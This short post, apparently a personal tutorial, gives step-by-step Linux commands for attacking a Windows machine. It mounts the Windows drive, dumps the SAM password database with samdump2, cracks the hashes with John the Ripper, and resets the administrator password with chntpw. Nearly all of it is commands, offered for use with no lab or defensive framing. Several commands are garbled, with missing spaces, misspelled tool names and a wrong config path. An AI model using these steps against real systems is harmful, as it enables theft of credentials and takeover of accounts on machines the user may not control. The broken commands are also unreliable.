ATTACKING WINDOWS USING LINUX OPERATING SYSTEM

-------------------------------------------------------------------------------------------------------------------------------
ATTACKING WINDOWS USING LINUX OPERATING SYSTEM
-------------------------------------------------------------------------------------------------------------------------------
CRACKING WINDOWS SAM ENCRYPTED FILE:-----

steps:--

                                      fdisk -l
                                      mount /dev/sda1/mnt/sda1/     (change /dev/sda1 with your drive name)
                                       cd /mnt/sda1/WINDOWS/system32/config/
                                       ls
                                       Samdumb2 System SAM>/tmp/hashes.txt
                                       cat/tmp/hashes.txt
                                       john
                                      ./john/tmp/hashes.txt



RESETTING WINDOWS ADMINISTRATIVE PASSWORD:--


                                 cd/pentest/passwords/chntpw
                                 ./chntpw -h
                                 ./chntw -i/mnt/sda1/windows/system/config/SAM

                         then the related option will come we need to collect the requires option what we want to dooo..

-------------vyshnav-------------------------

Comments